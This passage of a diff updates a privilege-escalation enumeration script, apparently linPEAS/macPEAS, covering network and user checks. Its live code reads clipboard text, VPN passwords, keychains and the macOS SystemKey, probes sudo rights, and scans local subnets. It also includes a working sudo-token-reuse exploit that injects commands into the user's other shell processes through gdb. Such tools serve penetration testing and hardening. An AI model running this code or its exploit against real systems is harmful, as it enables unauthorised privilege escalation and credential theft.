2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" echo "" +fi - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -ntpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports echo "" - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi + print_2title "VLANs" + networksetup -listVLANs echo "" - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi + echo "" - if [ "$AUTO_NETWORK_SCAN" ]; then + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + + else print_2title "Scanning local networks (using /24)" + + if ! [ "$PING" ] && ! [ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi + select_nc local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") printf "%s\n" "$local_ips" | while read local_ip; do if ! [ -z "$local_ip" ]; then print_3title "Discovering hosts in $local_ip/24" - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips @@ -2010,21 +2108,23 @@ if echo $CHECKS | grep -q Net; then fi done fi +fi - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," + echo "" + if [ "$EXTRA_CHECKS" ]; then print_2title "Bluetooth Info" warn_exec system_profiler SPBluetoothDataType echo "" @@ -2036,64 +2136,60 @@ if echo $CHECKS | grep -q Net; then print_2title "USB Info" warn_exec system_profiler SPUSBDataType echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" fi +fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q users_information; then +print_title "Users Information" +########################################### +#----------) Users Information (----------# +########################################### + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- UI) PGP keys? +print_2title "Do I have PGP keys?" +command -v gpg 2>/dev/null || echo_not_found "gpg" +gpg --list-keys 2>/dev/null +command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" +netpgpkeys --list-keys 2>/dev/null +command -v netpgp 2>/dev/null || echo_not_found "netpgp" +echo "" -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "" - - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" - - #-- UI) Clipboard and highlighted text +#-- UI) Clipboard and highlighted text +if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then print_2title "Clipboard or highlighted text?" if [ "$(command -v xclip 2>/dev/null)" ]; then echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," @@ -2106,52 +2202,57 @@ if echo $CHECKS | grep -q UsrI; then else echo_not_found "xsel and xclip" fi echo "" +fi - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +#-- UI) Sudo -l +print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" +if [ "$PASSWORD" ]; then + (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" +fi +( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" +if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," +fi +for filename in '/etc/sudoers.d/*'; do + if [ -r "$filename" ]; then + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" + grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," +done +echo "" + +#-- UI) Sudo tokens +print_2title "Checking sudo tokens" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; +fi +is_gdb="$(command -v gdb 2>/dev/null)" +if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; +else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; +fi +if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then + echo "Checking for sudo tokens in other shells owned by current user" + for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do + echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + if [ -f "/tmp/shrndom32r2r" ]; then + echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + break fi done - echo "" + if [ -f "/tmp/shrndom32r2r" ]; then + rm -f /tmp/shrndom32r2r 2>/dev/null + else echo "The escalation didn't work... (try again later?)" + fi +fi +echo "" - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${SED_RED},g"; - else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm /tmp/shrndom32r2r 2>/dev/null - echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - else echo "The escalation didn't work... (try again later?)" - fi - fi - echo "" - - #-- UI) Doas +#-- UI) Doas +if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then print_2title "Checking doas.conf" doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then @@ -2159,85 +2260,87 @@ if echo $CHECKS | grep -q UsrI; then else echo_not_found "doas.conf" fi echo "" +fi - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" +#-- UI) Pkexec policy +print_2title "Checking Pkexec policy" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" +(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" +echo "" - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" +#-- UI) Superusers +print_2title "Superusers" +awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," +echo "" - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done +#-- UI) Users with console +print_2title "Users with console" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q "$ushell" /etc/shells; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + echo "" fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" + done +else + no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) + unexpected_shells="" + printf "%s\n" "$no_shells" | while read f; do + if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + if [ "$unexpected_shells" ]; then + printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" + echo "Unexpected users with shells:" + printf "%s\n" "$unexpected_shells" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" fi done fi - echo "" +fi +echo "" - #-- UI) Password policy +#-- UI) All users & groups +print_2title "All users & groups" +if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" +fi +echo "" + +#-- UI) Login now +print_2title "Login now" +(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} 